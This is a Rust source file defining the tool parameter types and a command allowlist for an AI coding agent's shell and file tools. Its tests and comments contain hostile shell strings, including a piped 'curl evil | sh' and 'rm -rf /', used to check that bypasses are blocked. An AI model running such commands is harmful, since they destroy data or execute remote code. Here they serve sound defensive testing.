Skip to main content

winx_code_agent/
types.rs

1use schemars::JsonSchema;
2use serde::{Deserialize, Serialize};
3
4pub fn normalize_thread_id(thread_id: &str) -> String {
5    thread_id.chars().filter(|c| c.is_alphanumeric() || *c == '_').collect()
6}
7
8/// Type of shell environment initialization
9///
10/// This enum represents the different ways the Initialize tool can be called,
11/// depending on the current state of the conversation and what the user is requesting.
12#[derive(Debug, Serialize, Deserialize, JsonSchema, Clone, PartialEq)]
13#[serde(rename_all = "snake_case")]
14pub enum InitializeType {
15    /// Initial call at the start of a conversation
16    ///
17    /// This should be used for the first Initialize call in a conversation.
18    /// It sets up a new shell environment with the specified parameters.
19    FirstCall,
20
21    /// User requested to change the mode
22    ///
23    /// This should be used when the user asks to switch between modes
24    /// (e.g., from "wcgw" to "architect" or "`code_writer`").
25    UserAskedModeChange,
26
27    /// Reset the shell environment due to issues
28    ///
29    /// This should be used when the shell environment appears to be in a bad state
30    /// and needs to be reset to continue properly.
31    ResetShell,
32
33    /// User requested to change the workspace
34    ///
35    /// This should be used when the user asks to switch to a different
36    /// workspace or project directory during the conversation.
37    UserAskedChangeWorkspace,
38}
39
40#[derive(Debug, Clone, PartialEq)]
41pub enum ModeName {
42    Wcgw,
43    Architect,
44    CodeWriter,
45}
46
47// Custom serializer implementation to ensure values are properly quoted in JSON
48impl Serialize for ModeName {
49    fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
50    where
51        S: serde::Serializer,
52    {
53        match self {
54            ModeName::Wcgw => serializer.serialize_str("wcgw"),
55            ModeName::Architect => serializer.serialize_str("architect"),
56            ModeName::CodeWriter => serializer.serialize_str("code_writer"),
57        }
58    }
59}
60
61// Custom deserializer to support multiple aliases
62impl<'de> Deserialize<'de> for ModeName {
63    fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
64    where
65        D: serde::Deserializer<'de>,
66    {
67        let s = String::deserialize(deserializer)?;
68        match s.as_str() {
69            "wcgw" => Ok(ModeName::Wcgw),
70            "architect" => Ok(ModeName::Architect),
71            "code_writer" | "code_write" | "code-writer" => Ok(ModeName::CodeWriter),
72            _ => Err(serde::de::Error::custom(format!("Unknown mode name: {s}"))),
73        }
74    }
75}
76
77// Implement schema generation for JSON schema since we removed the derive
78impl JsonSchema for ModeName {
79    fn schema_name() -> std::borrow::Cow<'static, str> {
80        "ModeName".into()
81    }
82
83    fn json_schema(_gen: &mut schemars::SchemaGenerator) -> schemars::Schema {
84        schemars::Schema::new_ref("#/definitions/ModeName".to_string())
85    }
86}
87
88#[derive(Debug, Serialize, Deserialize, JsonSchema, Clone, PartialEq, Default)]
89pub struct CodeWriterConfig {
90    #[serde(default)]
91    pub allowed_globs: AllowedGlobs,
92    #[serde(default)]
93    pub allowed_commands: AllowedCommands,
94}
95
96impl CodeWriterConfig {
97    pub fn update_relative_globs(&mut self, workspace_root: &str) {
98        // Only process if we have a list of globs
99        if let AllowedGlobs::List(globs) = &self.allowed_globs {
100            let updated_globs = globs
101                .iter()
102                .map(|glob| {
103                    if std::path::Path::new(glob).is_absolute() {
104                        glob.clone()
105                    } else {
106                        format!("{workspace_root}/{glob}")
107                    }
108                })
109                .collect();
110
111            self.allowed_globs = AllowedGlobs::List(updated_globs);
112        }
113    }
114}
115
116#[derive(Debug, Serialize, Deserialize, JsonSchema, Clone, PartialEq)]
117#[serde(untagged)]
118pub enum AllowedGlobs {
119    All(String),
120    List(Vec<String>),
121}
122
123impl Default for AllowedGlobs {
124    fn default() -> Self {
125        AllowedGlobs::All("all".to_string())
126    }
127}
128
129impl AllowedGlobs {
130    /// Collapse the common LLM mistake `["all"]` into the wildcard `All("all")`.
131    /// Without this, a literal glob named "all" would be the only allowed path.
132    pub fn normalize(&mut self) {
133        if let AllowedGlobs::List(items) = self {
134            if items.len() == 1 && items[0] == "all" {
135                *self = AllowedGlobs::All("all".to_string());
136            }
137        }
138    }
139
140    #[allow(dead_code)]
141    pub fn is_allowed(&self, path: &str) -> bool {
142        match self {
143            AllowedGlobs::All(s) if s == "all" => true,
144            AllowedGlobs::List(globs) => globs.iter().any(|g| match glob::Pattern::new(g) {
145                Ok(pattern) => pattern.matches(path),
146                Err(_) => false,
147            }),
148            AllowedGlobs::All(_) => false,
149        }
150    }
151}
152
153#[derive(Debug, Serialize, Deserialize, JsonSchema, Clone, PartialEq)]
154#[serde(untagged)]
155pub enum AllowedCommands {
156    All(String),
157    List(Vec<String>),
158}
159
160impl Default for AllowedCommands {
161    fn default() -> Self {
162        AllowedCommands::All("all".to_string())
163    }
164}
165
166impl AllowedCommands {
167    /// Collapse the common LLM mistake `["all"]` into the wildcard `All("all")`.
168    pub fn normalize(&mut self) {
169        if let AllowedCommands::List(items) = self {
170            if items.len() == 1 && items[0] == "all" {
171                *self = AllowedCommands::All("all".to_string());
172            }
173        }
174    }
175
176    pub fn is_allowed(&self, command_line: &str) -> bool {
177        match self {
178            AllowedCommands::All(s) if s == "all" => true,
179            AllowedCommands::All(_) => false,
180            AllowedCommands::List(commands) => {
181                // Enforce the allowlist against EVERY command the line would run
182                // (pipelines, &&/||/;, command & process substitution, subshells),
183                // not just the first whitespace token — which `ls && curl|sh` and
184                // `ls $(rm -rf x)` trivially bypassed. A parse failure is fail
185                // closed: a restricted mode must not run what it can't vet.
186                match crate::utils::bash_parser::extract_command_texts(command_line) {
187                    Ok(cmds) if !cmds.is_empty() => cmds
188                        .iter()
189                        .all(|cmd| commands.iter().any(|allowed| command_has_prefix(cmd, allowed))),
190                    _ => false,
191                }
192            }
193        }
194    }
195}
196
197/// Whether `cmd` is the allowlist entry `allowed` or a sub-invocation of it,
198/// enforcing a word boundary so `ls` does not also permit `lsof`, and
199/// `cargo test` does not permit `cargo testimony`.
200fn command_has_prefix(cmd: &str, allowed: &str) -> bool {
201    let cmd = cmd.trim();
202    let allowed = allowed.trim();
203    if allowed.is_empty() {
204        return false;
205    }
206    cmd == allowed
207        || cmd.strip_prefix(allowed).is_some_and(|rest| rest.starts_with(char::is_whitespace))
208}
209
210/// Parameters for initializing the shell environment
211///
212/// This struct represents the parameters needed to initialize or update the shell environment.
213/// It is used by the Initialize tool, which must be called before any other shell tools.
214#[derive(Debug, Serialize, Deserialize, JsonSchema, Clone)]
215pub struct Initialize {
216    /// Initialization type, indicating the purpose of the call
217    ///
218    /// - `FirstCall`: Initial setup for a new conversation
219    /// - `UserAskedModeChange`: User requested to change the mode during a conversation
220    /// - `ResetShell`: Reset the shell if it's not working properly
221    /// - `UserAskedChangeWorkspace`: User requested to change the workspace during a conversation
222    #[serde(rename = "type")]
223    #[serde(default = "default_init_type")]
224    pub init_type: InitializeType,
225
226    /// Path to the workspace directory or file
227    ///
228    /// This can be an absolute path or a path relative to the current directory.
229    /// If it's a file, the parent directory will be used as the workspace.
230    /// If it doesn't exist and is an absolute path, it will be created.
231    /// If it's a relative path and doesn't exist, an error will be returned.
232    pub any_workspace_path: String,
233
234    /// List of files to read initially
235    ///
236    /// These files can be absolute paths or paths relative to the workspace.
237    /// They will be read and their contents provided in the response.
238    #[serde(default)]
239    pub initial_files_to_read: Vec<String>,
240
241    /// ID of a task to resume
242    ///
243    /// If provided during a `first_call`, the task with this ID will be resumed.
244    /// This allows continuing a conversation from a previous session.
245    #[serde(default = "String::new")]
246    #[serde(deserialize_with = "deserialize_string_or_null")]
247    pub task_id_to_resume: String,
248
249    /// Mode name for the shell environment
250    ///
251    /// - `wcgw`: Full permissions (default)
252    /// - `architect`: Restricted permissions, read-only
253    /// - `code_writer`: Custom permissions for code writing
254    #[serde(default = "default_mode_name")]
255    pub mode_name: ModeName,
256
257    /// ID of the thread session
258    ///
259    /// If not provided for a `first_call`, a new ID will be generated.
260    /// This ID must be included in all subsequent tool calls.
261    #[serde(default)]
262    #[serde(deserialize_with = "deserialize_string_or_null")]
263    pub thread_id: String,
264
265    /// Configuration for `code_writer` mode
266    ///
267    /// Only used when `mode_name` is "`code_writer`".
268    /// Specifies allowed commands and file globs for writing/editing.
269    #[serde(default)]
270    #[serde(deserialize_with = "deserialize_code_writer_config")]
271    pub code_writer_config: Option<CodeWriterConfig>,
272}
273
274// Custom deserializer for strings that might be null
275fn deserialize_string_or_null<'de, D>(deserializer: D) -> Result<String, D::Error>
276where
277    D: serde::Deserializer<'de>,
278{
279    // First try to deserialize as a string
280    let result = serde_json::Value::deserialize(deserializer)?;
281
282    match result {
283        // Return empty string for null values
284        serde_json::Value::Null => Ok(String::new()),
285        // If it's a string, use that
286        serde_json::Value::String(s) => {
287            // Handle "null" string specially
288            if s == "null" {
289                Ok(String::new())
290            } else {
291                Ok(s)
292            }
293        }
294        // Otherwise try to convert to a string
295        _ => match serde_json::to_string(&result) {
296            Ok(s) => Ok(s),
297            Err(_) => Ok(String::new()),
298        },
299    }
300}
301
302// Custom deserializer for code_writer_config that handles the "null" string case
303fn deserialize_code_writer_config<'de, D>(
304    deserializer: D,
305) -> Result<Option<CodeWriterConfig>, D::Error>
306where
307    D: serde::Deserializer<'de>,
308{
309    // This handles multiple possible input types
310    let value = serde_json::Value::deserialize(deserializer)?;
311
312    match value {
313        // If it's explicitly null or the string "null", return None
314        serde_json::Value::Null => Ok(None),
315        serde_json::Value::String(s) if s == "null" => Ok(None),
316        // Otherwise try to parse it as CodeWriterConfig
317        _ => {
318            match serde_json::from_value::<CodeWriterConfig>(value.clone()) {
319                Ok(config) => {
320                    tracing::debug!("Successfully parsed CodeWriterConfig: {:?}", config);
321                    Ok(Some(config))
322                }
323                Err(e) => {
324                    // Log the error and the value for debugging
325                    tracing::error!("Failed to parse CodeWriterConfig: {}. Value: {}", e, value);
326                    Ok(None) // Fall back to None on parse error
327                }
328            }
329        }
330    }
331}
332
333/// Default `mode_name` for Initialize
334fn default_mode_name() -> ModeName {
335    ModeName::Wcgw
336}
337
338/// Default `init_type` for Initialize
339fn default_init_type() -> InitializeType {
340    InitializeType::FirstCall
341}
342
343// Mode types
344#[derive(Debug, Clone, Copy, PartialEq)]
345pub enum Modes {
346    Wcgw,
347    Architect,
348    CodeWriter,
349}
350
351impl std::fmt::Display for Modes {
352    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
353        match self {
354            Modes::Wcgw => write!(f, "wcgw"),
355            Modes::Architect => write!(f, "architect"),
356            Modes::CodeWriter => write!(f, "code_writer"),
357        }
358    }
359}
360
361// Implement schema generation for Modes
362impl JsonSchema for Modes {
363    fn schema_name() -> std::borrow::Cow<'static, str> {
364        "Modes".into()
365    }
366
367    fn json_schema(_gen: &mut schemars::SchemaGenerator) -> schemars::Schema {
368        schemars::Schema::new_ref("#/definitions/Modes".to_string())
369    }
370}
371
372/// Special key types for shell interaction
373/// Matches wcgw Python's Specials enum exactly
374#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
375pub enum SpecialKey {
376    Enter,
377    #[serde(rename = "Key-up")]
378    KeyUp,
379    #[serde(rename = "Key-down")]
380    KeyDown,
381    #[serde(rename = "Key-left")]
382    KeyLeft,
383    #[serde(rename = "Key-right")]
384    KeyRight,
385    #[serde(rename = "Ctrl-c")]
386    CtrlC,
387    #[serde(rename = "Ctrl-d")]
388    CtrlD,
389    #[serde(rename = "Ctrl-z")]
390    CtrlZ,
391}
392
393/// Parameters for the `ReadFiles` tool
394///
395/// This struct represents the parameters needed to read one or more files.
396/// Line ranges can be specified in the path itself (e.g., "file.rs:10-20").
397#[derive(Debug, Clone, Serialize, JsonSchema)]
398pub struct ReadFiles {
399    /// List of file paths to read.
400    /// Supports line range syntax: "file.rs:10-20" for lines 10-20,
401    /// "file.rs:10-" for line 10 onwards, "file.rs:-20" for first 20 lines.
402    pub file_paths: Vec<String>,
403
404    // Internal fields - not part of MCP schema (parsed from file_paths)
405    #[serde(skip)]
406    #[schemars(skip)]
407    pub start_line_nums: Vec<Option<usize>>,
408
409    #[serde(skip)]
410    #[schemars(skip)]
411    pub end_line_nums: Vec<Option<usize>>,
412}
413
414// Custom deserializer for ReadFiles - parses line ranges from file paths like wcgw Python
415impl<'de> Deserialize<'de> for ReadFiles {
416    fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
417    where
418        D: serde::Deserializer<'de>,
419    {
420        #[derive(Deserialize)]
421        struct ReadFilesHelper {
422            file_paths: Option<Vec<String>>,
423        }
424
425        let input = serde_json::Value::deserialize(deserializer)?;
426
427        if !input.is_object() {
428            if input.is_null() {
429                return Err(serde::de::Error::custom("Cannot convert null to ReadFiles object."));
430            }
431            return Err(serde::de::Error::custom(format!("Expected object, got {input}")));
432        }
433
434        let helper: ReadFilesHelper = serde_json::from_value(input.clone())
435            .map_err(|e| serde::de::Error::custom(format!("Failed to parse ReadFiles: {e}")))?;
436
437        let file_paths = match helper.file_paths {
438            Some(paths) if !paths.is_empty() => paths,
439            Some(_) => return Err(serde::de::Error::custom("file_paths must not be empty.")),
440            None => return Err(serde::de::Error::custom("file_paths is required.")),
441        };
442
443        // Parse line ranges from file paths (like wcgw Python's model_post_init)
444        let mut clean_file_paths = Vec::with_capacity(file_paths.len());
445        let mut start_line_nums = Vec::with_capacity(file_paths.len());
446        let mut end_line_nums = Vec::with_capacity(file_paths.len());
447
448        for path in file_paths {
449            let (clean_path, start, end) = parse_file_path_with_line_range(&path);
450            clean_file_paths.push(clean_path);
451            start_line_nums.push(start);
452            end_line_nums.push(end);
453        }
454
455        Ok(ReadFiles { file_paths: clean_file_paths, start_line_nums, end_line_nums })
456    }
457}
458
459fn parse_file_path_with_line_range(path: &str) -> (String, Option<usize>, Option<usize>) {
460    let Some((potential_path, line_spec)) = path.rsplit_once(':') else {
461        return (path.to_string(), None, None);
462    };
463
464    let Some((start, end)) = parse_line_spec(line_spec) else {
465        return (path.to_string(), None, None);
466    };
467
468    (potential_path.to_string(), start, end)
469}
470
471fn parse_line_spec(line_spec: &str) -> Option<(Option<usize>, Option<usize>)> {
472    if line_spec.chars().all(|c| c.is_ascii_digit()) {
473        return line_spec.parse().ok().map(|line| (Some(line), None));
474    }
475
476    let (start, end) = line_spec.split_once('-')?;
477
478    if start.is_empty() && !end.is_empty() && end.chars().all(|c| c.is_ascii_digit()) {
479        return end.parse().ok().map(|line| (None, Some(line)));
480    }
481
482    if !start.is_empty()
483        && start.chars().all(|c| c.is_ascii_digit())
484        && (end.is_empty() || end.chars().all(|c| c.is_ascii_digit()))
485    {
486        let start = start.parse().ok()?;
487        let end = if end.is_empty() { None } else { Some(end.parse().ok()?) };
488        return Some((Some(start), end));
489    }
490
491    None
492}
493
494impl ReadFiles {
495    /// Line numbers are always shown (like wcgw Python)
496    pub fn show_line_numbers(&self) -> bool {
497        true
498    }
499
500    /// Get the clean file path without line range suffix
501    pub fn get_clean_path(&self, index: usize) -> String {
502        parse_file_path_with_line_range(&self.file_paths[index]).0
503    }
504}
505
506/// Default true value for `status_check`
507fn default_true() -> bool {
508    true
509}
510
511/// Types of actions that can be performed with the `BashCommand` tool
512#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
513#[serde(tag = "type", rename_all = "snake_case")]
514pub enum BashCommandAction {
515    /// Execute a shell command
516    Command {
517        command: String,
518        #[serde(default)]
519        is_background: bool,
520        /// Opt out of the single-top-level-statement guard. By default winx
521        /// rejects multi-statement commands (`a; b`, `a && b; c`, etc.) so the
522        /// agent has to be explicit about what it's running. Set this to true
523        /// when you knowingly want to run a composite command without
524        /// wrapping it in `bash -lc '...'`.
525        #[serde(default)]
526        allow_multi: bool,
527    },
528
529    /// Check the status of a running command.
530    ///
531    /// By default returns only what changed since the previous call — agents
532    /// driving long-lived TUIs do not need the cumulative buffer on every poll.
533    /// Set `verbose: true` to receive a fresh snapshot regardless of the dedup
534    /// hash, or `scrollback_lines: Some(N)` to also pull the last N lines from
535    /// the PTY ringbuffer.
536    StatusCheck {
537        #[serde(default = "default_true")]
538        status_check: bool,
539        bg_command_id: Option<String>,
540        #[serde(default)]
541        scrollback_lines: Option<usize>,
542        #[serde(default)]
543        verbose: bool,
544    },
545
546    /// Send text to a running command. Set `submit` to true to append a carriage
547    /// return after the bytes so the target program receives the input as a
548    /// completed line (matches what hitting Enter would do in a TUI).
549    SendText {
550        send_text: String,
551        bg_command_id: Option<String>,
552        #[serde(default)]
553        submit: bool,
554    },
555
556    /// Send special keys to a running command. `submit` works the same as in
557    /// `SendText`.
558    SendSpecials {
559        send_specials: Vec<SpecialKey>,
560        bg_command_id: Option<String>,
561        #[serde(default)]
562        submit: bool,
563    },
564
565    /// Send ASCII characters to a running command. `submit` works the same as in
566    /// `SendText`.
567    SendAscii {
568        send_ascii: Vec<u8>,
569        bg_command_id: Option<String>,
570        #[serde(default)]
571        submit: bool,
572    },
573}
574
575/// Parameters for the `BashCommand` tool
576#[derive(Debug, Clone, Serialize, JsonSchema)]
577pub struct BashCommand {
578    /// The action to perform (command, status check, etc.)
579    pub action_json: BashCommandAction,
580
581    /// Optional timeout in seconds to wait for command completion
582    #[serde(default)]
583    #[serde(skip_serializing_if = "Option::is_none")]
584    pub wait_for_seconds: Option<f32>,
585
586    /// The thread ID for this session
587    #[serde(default)]
588    pub thread_id: String,
589}
590
591// Custom deserialization for BashCommand to handle string-encoded action_json
592impl<'de> Deserialize<'de> for BashCommand {
593    fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
594    where
595        D: serde::Deserializer<'de>,
596    {
597        let input = serde_json::Value::deserialize(deserializer)?;
598        let serde_json::Value::Object(mut map) = input else {
599            return Err(serde::de::Error::custom("BashCommand parameters must be an object."));
600        };
601
602        let wait_for_seconds = map
603            .remove("wait_for_seconds")
604            .map(serde_json::from_value)
605            .transpose()
606            .map_err(serde::de::Error::custom)?;
607        let thread_id = map
608            .remove("thread_id")
609            .map(thread_id_from_value)
610            .transpose()
611            .map_err(serde::de::Error::custom)?
612            .unwrap_or_default();
613        let action_json_value = map.remove("action_json").unwrap_or(serde_json::Value::Object(map));
614
615        // Process action_json which could be a string or an object
616        let action_json = match action_json_value {
617            serde_json::Value::String(s) => {
618                // If it's a string, normalize newlines and try to parse it as JSON
619                // Replace literal newlines with space to avoid JSON parsing errors
620                let sanitized = s.replace('\n', " ");
621                match serde_json::from_str(&sanitized) {
622                    Ok(json) => normalize_action_json(json),
623                    Err(e) => {
624                        // If strict JSON parsing fails, try to be more lenient
625                        // For commands containing literal newlines, just wrap the string in a command object
626                        tracing::warn!(
627                            "Failed to parse action_json as JSON, trying fallback: {}",
628                            e
629                        );
630
631                        // Check for common JSON syntax issues
632                        if s.contains("command") && s.contains('{') && s.contains('}') {
633                            // It looks like JSON but has issues, let's try to sanitize it
634
635                            // Detailed error for troubleshooting
636                            tracing::debug!("JSON parse error on: {}", s);
637
638                            // Common issues: unescaped quotes, newlines, tabs
639                            let re_sanitized = s
640                                .replace('\n', "\\n") // Replace newlines with escaped newlines
641                                .replace('\r', "\\r") // Replace carriage returns with escaped versions
642                                .replace('\t', "\\t"); // Replace tabs with escaped versions
643
644                            // Attempt to fix unquoted field values (e.g., convert {field: value} to {"field": "value"})
645                            let re_sanitized = if !s.contains('"') && s.contains(':') {
646                                // Very likely unquoted keys/values
647                                tracing::debug!("Attempting to fix unquoted JSON keys/values");
648                                re_sanitized
649                            } else {
650                                re_sanitized
651                            };
652
653                            match serde_json::from_str(&re_sanitized) {
654                                Ok(json) => normalize_action_json(json),
655                                Err(err) => {
656                                    // Log the specific parsing error for debugging
657                                    tracing::error!("Secondary JSON parse error: {}", err);
658                                    // Last resort fallback - assume it's a command string
659                                    // MUST include "type": "command" for serde tagged enum
660                                    serde_json::json!({"type": "command", "command": sanitize_shell_string(&s)})
661                                }
662                            }
663                        } else {
664                            // Assume it's a simple command string
665                            // MUST include "type": "command" for serde tagged enum
666                            tracing::info!("Treating as simple command: {}", s);
667                            serde_json::json!({"type": "command", "command": sanitize_shell_string(&s)})
668                        }
669                    }
670                }
671            }
672            // If it's already an object or other JSON value, normalize legacy
673            // WCGW-style shorthand such as {"command": "..."}.
674            value => normalize_action_json(value),
675        };
676
677        // Now deserialize the action_json to our BashCommandAction enum
678        let mut action: BashCommandAction =
679            serde_json::from_value(action_json.clone()).map_err(|e| {
680// Log both the error and the problematic JSON for debugging
681tracing::error!(
682    "Failed to deserialize action_json to BashCommandAction: {}\nProblematic JSON: {}",
683    e,
684    action_json
685);
686
687// For the SyntaxError: Unexpected token case
688let err_str = e.to_string();
689if err_str.contains("unexpected token") || err_str.contains("Unexpected token") {
690    return serde::de::Error::custom(format!(
691        "JSON syntax error: {e}. Please check your JSON structure. Each field name should be in quotes, and string values should be in quotes."
692    ));
693}
694
695serde::de::Error::custom(format!("Invalid action_json: {e}. Please ensure your JSON is properly formatted."))
696        })?;
697
698        // Return the properly constructed BashCommand
699        Ok(BashCommand {
700            action_json: action,
701            wait_for_seconds,
702            thread_id: normalize_thread_id(&thread_id),
703        })
704    }
705}
706
707fn thread_id_from_value(value: serde_json::Value) -> std::result::Result<String, String> {
708    match value {
709        serde_json::Value::Null => Ok(String::new()),
710        serde_json::Value::String(value) => Ok(value),
711        other => Err(format!("thread_id must be a string or null, got {other}")),
712    }
713}
714
715fn normalize_action_json(mut value: serde_json::Value) -> serde_json::Value {
716    let serde_json::Value::Object(map) = &mut value else {
717        return value;
718    };
719
720    if let Some(serde_json::Value::String(command)) = map.get_mut("command") {
721        *command = sanitize_shell_string(command);
722    }
723
724    if map.contains_key("type") {
725        return value;
726    }
727
728    let inferred_type = if map.contains_key("command") {
729        Some("command")
730    } else if map.contains_key("status_check") {
731        Some("status_check")
732    } else if map.contains_key("send_text") {
733        Some("send_text")
734    } else if map.contains_key("send_specials") {
735        Some("send_specials")
736    } else if map.contains_key("send_ascii") {
737        Some("send_ascii")
738    } else {
739        None
740    };
741
742    if let Some(action_type) = inferred_type {
743        map.insert("type".to_string(), serde_json::Value::String(action_type.to_string()));
744    }
745
746    value
747}
748
749fn sanitize_shell_string(value: &str) -> String {
750    value.replace('\0', "\\x00")
751}
752
753// Bash command mode
754#[derive(Debug, Clone, JsonSchema, PartialEq)]
755pub struct BashCommandMode {
756    pub bash_mode: BashMode,
757    pub allowed_commands: AllowedCommands,
758}
759
760#[derive(Debug, Clone, Copy, JsonSchema, PartialEq)]
761pub enum BashMode {
762    NormalMode,
763    RestrictedMode,
764}
765
766// File edit mode
767#[derive(Debug, Clone, JsonSchema, PartialEq)]
768pub struct FileEditMode {
769    pub allowed_globs: AllowedGlobs,
770}
771
772// Write if empty mode
773#[derive(Debug, Clone, JsonSchema, PartialEq)]
774pub struct WriteIfEmptyMode {
775    pub allowed_globs: AllowedGlobs,
776}
777
778/// Parameters for the `FileWriteOrEdit` tool
779///
780/// This struct represents the parameters needed to write or edit a file
781/// with optional search/replace blocks for partial edits.
782#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
783pub struct FileWriteOrEdit {
784    /// Path to the file to write or edit
785    ///
786    /// This must be an absolute path (~ allowed).
787    pub file_path: String,
788
789    /// Percentage of the file that will be changed
790    ///
791    /// If > 50%, the content is treated as the entire file content.
792    /// If <= 50%, the content is treated as search/replace blocks.
793    pub percentage_to_change: u32,
794
795    /// Content for the file or search/replace blocks
796    ///
797    /// If `percentage_to_change` > 50%, this is the entire file content.
798    /// If `percentage_to_change` <= 50%, this contains search/replace blocks
799    /// in the format:
800    /// ```text
801    /// <<<<<<< SEARCH
802    /// old content to find
803    /// =======
804    /// new content to replace with
805    /// >>>>>>> REPLACE
806    /// ```
807    pub text_or_search_replace_blocks: String,
808
809    /// The thread ID for this session
810    pub thread_id: String,
811}
812
813/// Parameters for the `ContextSave` tool
814///
815/// This struct represents the parameters needed to save context information
816/// about a task, including file contents from specified globs.
817#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
818pub struct ContextSave {
819    /// Unique identifier for the task
820    ///
821    /// This should be a unique string that identifies the task. It can be
822    /// a random 3-word identifier or a user-provided value.
823    pub id: String,
824
825    /// Root path of the project
826    ///
827    /// This should be an absolute path to the project root. If empty, no
828    /// project root will be used.
829    pub project_root_path: String,
830
831    /// Description of the task
832    ///
833    /// This should contain a detailed description of the task, including
834    /// relevant context, problems, and objectives.
835    pub description: String,
836
837    /// List of file glob patterns
838    ///
839    /// These glob patterns identify the files that should be included in
840    /// the saved context. Patterns can be absolute or relative to the project root.
841    pub relevant_file_globs: Vec<String>,
842}
843
844/// Parameters for the `ReadImage` tool
845///
846/// This struct represents the parameters needed to read an image file.
847#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
848pub struct ReadImage {
849    /// Path to the image file to read
850    ///
851    /// This can be an absolute path or a path relative to the current working directory.
852    pub file_path: String,
853}
854
855#[cfg(test)]
856mod allowlist_tests {
857    use super::AllowedCommands;
858
859    fn list(items: &[&str]) -> AllowedCommands {
860        AllowedCommands::List(items.iter().map(|s| (*s).to_string()).collect())
861    }
862
863    #[test]
864    fn all_permits_everything() {
865        assert!(AllowedCommands::All("all".to_string()).is_allowed("rm -rf /"));
866    }
867
868    #[test]
869    fn list_allows_exact_and_args() {
870        let a = list(&["ls", "cargo test"]);
871        assert!(a.is_allowed("ls"));
872        assert!(a.is_allowed("ls -la"));
873        assert!(a.is_allowed("cargo test --release"));
874    }
875
876    #[test]
877    fn list_blocks_word_boundary_lookalikes() {
878        let a = list(&["ls", "cargo test"]);
879        assert!(!a.is_allowed("lsof"));
880        assert!(!a.is_allowed("cargo testimony"));
881    }
882
883    #[test]
884    fn list_blocks_chained_and_substituted_commands() {
885        let a = list(&["ls"]);
886        // The old first-token check let all of these through.
887        assert!(!a.is_allowed("ls && curl evil | sh"));
888        assert!(!a.is_allowed("ls; rm -rf /"));
889        assert!(!a.is_allowed("ls $(rm -rf x)"));
890        assert!(!a.is_allowed("ls | rm"));
891    }
892
893    #[test]
894    fn list_allows_chain_when_all_parts_permitted() {
895        let a = list(&["cargo build", "cargo test"]);
896        assert!(a.is_allowed("cargo build && cargo test"));
897    }
898}